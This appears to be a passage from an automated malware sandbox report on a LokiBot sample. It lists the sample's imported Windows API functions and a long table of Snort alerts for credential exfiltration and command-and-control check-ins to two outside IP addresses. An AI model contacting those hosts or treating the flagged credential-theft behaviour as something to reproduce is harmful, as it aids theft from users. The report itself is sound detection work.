USER32.dll	SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/14/21-08:28:19.047157	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49779	80	192.168.2.6	172.67.219.104
10/14/21-08:28:19.047157	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.6	172.67.219.104
10/14/21-08:28:19.047157	TCP	2025381	ET TROJAN LokiBot Checkin	49779	80	192.168.2.6	172.67.219.104
10/14/21-08:28:19.047157	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49779	80	192.168.2.6	172.67.219.104
10/14/21-08:28:20.347127	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49780	80	192.168.2.6	172.67.219.104
10/14/21-08:28:20.347127	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.6	172.67.219.104
10/14/21-08:28:20.347127	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.6	172.67.219.104
10/14/21-08:28:20.347127	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49780	80	192.168.2.6	172.67.219.104
10/14/21-08:28:21.339482	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.6	104.21.62.32
10/14/21-08:28:21.339482	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.6	104.21.62.32
10/14/21-08:28:21.339482	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.6	104.21.62.32
10/14/21-08:28:21.339482	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.6	104.21.62.32
10/14/21-08:28:22.592928	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.6	104.21.62.32
10/14/21-08:28:22.592928	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.6	104.21.62.32
10/14/21-08:28:22.592928	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.6	104.21.62.32
10/14/21-08:28:22.592928	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.6	104.21.62.32
10/14/21-08:28:23.792482	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.6	172.67.219.104
10/14/21-08:28:23.792482	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.6	172.67.219.104
10/14/21-08:28:23.792482	TCP	2025381	ET TROJAN LokiBot Checkin	49783	80	192.168.2.6	172.67.219.104
10/14/21-08:28:23.792482	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49783	80	192.168.2.6	172.67.219.104
10/14/21-08:28:24.885116	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.6	172.67.219.104
10/14/21-08:28:24.885116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.6	172.67.219.104
10/14/21-08:28:24.885116	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.6	172.67.219.104
10/14/21-08:28:24.885116	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.6	172.67.219.104
10/14/21-08:28:26.025162	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.6	104.21.62.32
10/14/21-08:28:26.025162	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.6	104.21.62.32
10/14/21-08:28:26.025162	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.6	104.21.62.32
10/14/21-08:28:26.025162	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.6	104.21.62.32
10/14/21-08:28:27.340972	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.6	172.67.219.104
10/14/21-08:28:27.340972	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.6	172.67.219.104
10/14/21-08:28:27.340972	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.6	172.67.219.104
10/14/21-08:28:27.340972	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.6	172.67.219.104
10/14/21-08:28:30.289742	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.6	172.67.219.104
10/14/21-08:28:30.289742	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.6	172.67.219.104
10/14/21-08:28:30.289742	TCP	2025381	ET TROJAN LokiBot Checkin	49787	80	192.168.2.6	172.67.219.104
10/14/21-08:28:30.289742	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.6	172.67.219.104
10/14/21-08:28:31.397798	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.6	172.67.219.104
10/14/21-08:28:31.397798	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.6	172.67.219.104
10/14/21-08:28:31.397798	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.6	172.67.219.104
10/14/21-08:28:31.397798	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.6	172.67.219.104
10/14/21-08:28:32.511259	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.6	172.67.219.104
10/14/21-08:28:32.511259	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.6	172.67.219.104
10/14/21-08:28:32.511259	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.6	172.67.219.104
10/14/21-08:28:32.511259	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.6	172.67.219.104
10/14/21-08:28:33.672462	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.6	104.21.62.32
10/14/21-08:28:33.672462	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.6	104.21.62.32
10/14/21-08:28:33.672462	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.6	104.21.62.32
10/14/21-08:28:33.672462	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.6	104.21.62.32
10/14/21-08:28:34.890356	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.6	172.67.219.104
10/14/21-08:28:34.890356	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.6	172.67.219.104
10/14/21-08:28:34.890356	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.6	172.67.219.104
10/14/21-08:28:34.890356	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.6	172.67.219.104
10/14/21-08:28:35.993003	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.6	172.67.219.104
10/14/21-08:28:35.993003	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.6	172.67.219.104
10/14/21-08:28:35.993003	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.6	172.67.219.104
10/14/21-08:28:35.993003	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.6	172.67.219.104
10/14/21-08:28:37.119939	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.6	104.21.62.32
10/14/21-08:28:37.119939	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.6	104.21.62.32
10/14/21-08:28:37.119939	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.6	104.21.62.32
10/14/21-08:28:37.119939	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.6	104.21.62.32
10/14/21-08:28:38.386394	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.6	172.67.219.104
10/14/21-08:28:38.386394	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.6	172.67.219.104
10/14/21-08:28:38.386394	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.6	172.67.219.104
10/14/21-08:28:38.386394	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.6	172.67.219.104
10/14/21-08:28:39.512557	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.6	172.67.219.104
10/14/21-08:28:39.512557	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.6	172.67.219.104
10/14/21-08:28:39.512557	TCP	2025381	ET TROJAN LokiBot Checkin	49795	80	192.168.2.6	172.67.219.104
10/14/21-08:28:39.512557	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.6	172.67.219.104
10/14/21-08:28:41.105942	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.6	172.67.219.104
10/14/21-08:28:41.105942	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.6	172.67.219.104
10/14/21-08:28:41.105942	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.6	172.67.219.104
10/14/21-08:28:41.105942	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.6	172.67.219.104
10/14/21-08:28:42.274934	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.6	172.67.219.104
10/14/21-08:28:42.274934	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.6	172.67.219.104
10/14/21-08:28:42.274934	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.6	172.67.219.104
10/14/21-08:28:42.274934	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49799	80	192.168.2.6	172.67.219.104
10/14/21-08:28:43.873245	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.6	104.21.62.32
10/14/21-08:28:43.873245	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.6	104.21.62.32
10/14/21-08:28:43.873245	TCP	2025381	ET TROJAN LokiBot Checkin	49800	80	192.168.2.6	104.21.62.32
10/14/21-08:28:43.873245	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49800	80	192.168.2.6	104.21.62.32
10/14/21-08:28:45.343359	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.6	172.67.219.104
10/14/21-08:28:45.343359	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.6	172.67.219.104
10/14/21-08:28:45.343359	TCP	2025381	ET TROJAN LokiBot Checkin	49801	80	192.168.2.6	172.67.219.104
10/14/21-08:28:45.343359	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49801	80	192.168.2.6	172.67.219.104
10/14/21-08:28:48.039638	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.6	104.21.62.32
10/14/21-08:28:48.039638	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.6	104.21.62.32
10/14/21-08:28:48.039638	TCP	2025381	ET TROJAN LokiBot Checkin	49802	80	192.168.2.6	104.21.62.32
10/14/21-08:28:48.039638	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49802	80	192.168.2.6	104.21.62.32
10/14/21-08:28:49.659261	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.6	104.21.62.32
10/14/21-08:28:49.659261	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.6	104.21.62.32
10/14/21-08:28:49.659261	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.6	104.21.62.32
10/14/21-08:28:49.659261	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.6	104.21.62.32
10/14/21-08:28:50.976327	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.6	104.21.62.32
10/14/21-08:28:50.976327	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.6	104.21.62.32
10/14/21-08:28:50.976327	TCP	2025381	ET TROJAN LokiBot Checkin	49804	80	192.168.2.6	104.21.62.32
10/14/21-08:28:50.976327	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49804	80	192.168.2.6	104.21.62.32
10/14/21-08:28:52.327367	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.6	104.21.62.32
10/14/21-08:28:52.327367	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.6	104.21.62.32
10/14/21-08:28:52.327367	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.6	104.21.62.32
10/14/21-08:28:52.327367	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.6	104.21.62.32
10/14/21-08:28:53.563440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.6	172.67.219.104
10/14/21-08:28:53.563440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.6	172.67.219.104
10/14/21-08:28:53.563440	TCP	2025381	ET TROJAN LokiBot Checkin	49806	80	192.168.2.6	172.67.219.104
10/14/21-08:28:53.563440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49806	80	192.168.2.6	172.67.219.104
10/14/21-08:28:54.645979	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.6	104.21.62.32
10/14/21-08:28:54.645979	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.6	104.21.62.32
10/14/21-08:28:54.645979	TCP	2025381	ET TROJAN LokiBot Checkin	49807	80	192.168.2.6	104.21.62.32
10/14/21-08:28:54.645979	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49807	80	192.168.2.6	104.21.62.32
10/14/21-08:28:56.080095	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49808	80	192.168.2.6	172.67.219.104
10/14/21-08:28:56.080095	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49808	80	192.168.2.6	172.67.219.104
10/14/21-08:28:56.080095	TCP	2025381	ET TROJAN LokiBot Checkin	49808	80	192.168.2.6	172.67.219.104
10/14/21-08:28:56.080095	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49808	80	192.168.2.6	172.67.219.104
10/14/21-08:28:57.516460	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49810	80	192.168.2.6	172.67.219.104
10/14/21-08:28:57.516460	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49810	80	192.168.2.6	172.67.219.104
10/14/21-08:28:57.516460	TCP	2025381	ET TROJAN LokiBot Checkin	49810	80	192.168.2.6	172.67.219.104
10/14/21-08:28:57.516460	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49810	80	192.168.2.6	172.67.219.104
10/14/21-08:28:58.883205	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49811	80	192.168.2.6	172.67.219.104
10/14/21-08:28:58.883205	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49811	80	192.168.2.6	172.67.219.104
10/14/21-08:28:58.883205	TCP	2025381	ET TROJAN LokiBot Checkin	49811	80	192.168.2.6	172.67.219.104
10/14/21-08:28:58.883205	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49811	80	192.168.2.6	172.67.219.104
10/14/21-08:29:00.298238	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49812	80	192.168.2.6	172.67.219.104
10/14/21-08:29:00.298238	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49812	80	192.168.2.6	172.67.219.104
10/14/21-08:29:00.298238	TCP	2025381	ET TROJAN LokiBot Checkin	49812	80	192.168.2.6	172.67.219.104
10/14/21-08:29:00.298238	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49812	80	192.168.2.6	172.67.219.104
10/14/21-08:29:01.666924	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49813	80	192.168.2.6	172.67.219.104
10/14/21-08:29:01.666924	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49813	80	192.168.2.6	172.67.219.104
10/14/21-08:29:01.666924	TCP	2025381	ET TROJAN LokiBot Checkin	49813	80	192.168.2.6	172.67.219.104
10/14/21-08:29:01.666924	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49813	80	192.168.2.6	172.67.219.104
10/14/21-08:29:03.076480	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49814	80	192.168.2.6	104.21.62.32
10/14/21-08:29:03.076480	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49814	80	192.168.2.6	104.21.62.32
10/14/21-08:29:03.076480	TCP	2025381	ET TROJAN LokiBot Checkin	49814	80	192.168.2.6	104.21.62.32
10/14/21-08:29:03.076480	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49814	80	192.168.2.6	104.21.62.32
10/14/21-08:29:06.184636	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49815	80	192.168.2.6	172.67.219.104
10/14/21-08:29:06.184636	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49815	80	192.168.2.6	172.67.219.104
10/14/21-08:29:06.184636	TCP	2025381	ET TROJAN LokiBot Checkin	49815	80	192.168.2.6	172.67.219.104
10/14/21-08:29:06.184636	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49815	80	192.168.2.6	172.67.219.104
10/14/21-08:29:07.530339	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49816	80	192.168.2.6	172.67.219.104
10/14/21-08:29:07.530339	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49816	80	192.168.2.6	172.67.219.104
10/14/21-08:29:07.530339	TCP	2025381	ET TROJAN LokiBot Checkin	49816	80	192.168.2.6	172.67.219.104
10/14/21-08:29:07.530339	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49816	80	192.168.2.6	172.67.219.104
10/14/21-08:29:08.722566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49817	80	192.168.2.6	104.21.62.32
10/14/21-08:29:08.722566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49817	80	192.168.2.6	104.21.62.32
10/14/21-08:29:08.722566	TCP	2025381	ET TROJAN LokiBot Checkin	49817	80	192.168.2.6	104.21.62.32
10/14/21-08:29:08.722566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49817	80	192.168.2.6	104.21.62.32
10/14/21-08:29:09.909566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49820	80	192.168.2.6	104.21.62.32
10/14/21-08:29:09.909566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49820	80	192.168.2.6	104.21.62.32
10/14/21-08:29:09.909566	TCP	2025381	ET TROJAN LokiBot Checkin	49820	80	192.168.2.6	104.21.62.32
10/14/21-08:29:09.909566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49820	80	192.168.2.6	104.21.62.32
10/14/21-08:29:11.124122	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49826	80	192.168.2.6	172.67.219.104
10/14/21-08:29:11.124122	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49826	80	192.168.2.6	172.67.219.104
10/14/21-08:29:11.124122	TCP	2025381	ET TROJAN LokiBot Checkin	49826	80	192.168.2.6	172.67.219.104
10/14/21-08:29:11.124122	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49826	80	192.168.2.6	172.67.219.104
10/14/21-08:29:12.348796	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49834	80	192.168.2.6	172.67.219.104
10/14/21-08:29:12.348796	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49834	80	192.168.2.6	172.67.219.104
10/14/21-08:29:12.348796	TCP	2025381	ET TROJAN LokiBot Checkin	49834	80	192.168.2.6	172.67.219.104
10/14/21-08:29:12.348796	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49834	80	192.168.2.6	172.67.219.104
10/14/21-08:29:13.657085	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49843	80	192.168.2.6	172.67.219.104
10/14/21-08:29:13.657085	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49843	80	192.168.2.6	172.67.219.104
10/14/21-08:29:13.657085	TCP	2025381	ET TROJAN LokiBot Checkin	49843	80	192.168.2.6	172.67.219.104
10/14/21-08:29:13.657085	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49843	80	192.168.2.6	172.67.219.104
10/14/21-08:29:15.138022	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49853	80	192.168.2.6	172.67.219.104
10/14/21-08:29:15.138022	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49853	80	192.168.2.6	172.67.219.104
10/14/21-08:29:15.138022	TCP	2025381	ET TROJAN LokiBot Checkin	49853	80	192.168.2.6	172.67.219.104
10/14/21-08:29:15.138022	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49853	80	192.168.2.6	172.67.219.104
10/14/21-08:29:16.658468	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49860	80	192.168.2.6	104.21.62.32
10/14/21-08:29:16.658468	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49860	80	192.168.2.6	104.21.62.32
10/14/21-08:29:16.658468	TCP	2025381	ET TROJAN LokiBot Checkin	49860	80	192.168.2.6	104.21.62.32
10/14/21-08:29:16.658468	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49860	80	192.168.2.6	104.21.62.32
10/14/21-08:29:18.009856	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49863	80	192.168.2.6	104.21.62.32
10/14/21-08:29:18.009856	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49863	80	192.168.2.6	104.21.62.32
10/14/21-08:29:18.009856	TCP	2025381	ET TROJAN LokiBot Checkin	49863	80	192.168.2.6	104.21.62.32
10/14/21-08:29:18.009856	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49863	80	192.168.2.6	104.21.62.32
10/14/21-08:29:20.400475	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49864	80	192.168.2.6	104.21.62.32
10/14/21-08:29:20.400475	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49864	80	192.168.2.6	104.21.62.32
10/14/21-08:29:20.400475	TCP	2025381	ET TROJAN LokiBot Checkin	49864	80	192.168.2.6	104.21.62.32
10/14/21-08:29:20.400475	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49864	80	192.168.2.6	104.21.62.32
10/14/21-08:29:21.825019	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49870	80	192.168.2.6	172.67.219.104
10/14/21-08:29:21.825019	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49870	80	192.168.2.6	172.67.219.104
10/14/21-08:29:21.825019	TCP	2025381	ET TROJAN LokiBot Checkin	49870	80	192.168.2.6	172.67.219.104
10/14/21-08:29:21.825019	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49870	80	192.168.2.6	172.67.219.104
10/14/21-08:29:23.419826	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49871	80	192.168.2.6	104.21.62.32
10/14/21-08:29:23.419826	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49871	80	192.168.2.6	104.21.62.32
10/14/21-08:29:23.419826	TCP	2025381	ET TROJAN LokiBot Checkin	49871	80	192.168.2.6	104.21.62.32
10/14/21-08:29:23.419826	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49871	80	192.168.2.6	104.21.62.32
10/14/21-08:29:27.468224	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49872	80	192.168.2.6	172.67.219.104
10/14/21-08:29:27.468224	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49872	80	192.168.2.6	172.67.219.104
10/14/21-08:29:27.468224	TCP	2025381	ET TROJAN LokiBot Checkin	49872	80	192.168.2.6	172.67.219.104
10/14/21-08:29:27.468224	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49872	80	192.168.2.6	172.67.219.104
10/14/21-08:29:29.646629	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49873	80	192.168.2.6	104.21.62.32
10/14/21-08:29:29.646629	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49873	80	192.168.2.6	104.21.62.32
10/14/21-08:29:29.646629	TCP	2025381	ET TROJAN LokiBot Checkin	49873	80	192.168.2.6	104.21.62.32
10/14/21-08:29:29.646629	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49873	80	192.168.2.6	104.21.62.32
10/14/21-08:29:31.734477	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49875	80	192.168.2.6	172.67.219.104
10/14/21-08:29:31.734477	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49875	80	192.168.2.6	172.67.219.104
10/14/21-08:29:31.734477	TCP	2025381	ET TROJAN LokiBot Checkin	49875	80	192.168.2.6	172.67.219.104
10/14/21-08:29:31.734477	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49875	80	192.168.2.6	172.67.219.104
10/14/21-08:29:33.006583	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49876	80	192.168.2.6	172.67.219.104
10/14/21-08:29:33.006583	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49876	80	192.168.2.6	172.67.219.104
10/14/21-08:29:33.006583	TCP	2025381	ET TROJAN LokiBot Checkin	49876	80	192.168.2.6	172.67.219.104
10/14/21-08:29:33.006583	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49876	80	192.168.2.6	172.67.219.104
10/14/21-08:29:35.265241	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49878	80	192.168.2.6	104.21.62.32
10/14/21-08:29:35.265241	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49878	80	192.168.2.6	104.21.62.32
10/14/21-08:29:35.265241	TCP	2025381	ET TROJAN LokiBot Checkin	49878	80	192.168.2.6	104.21.62.32
10/14/21-08:29:35.265241	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49878	80	192.168.2.6	104.21.62.32
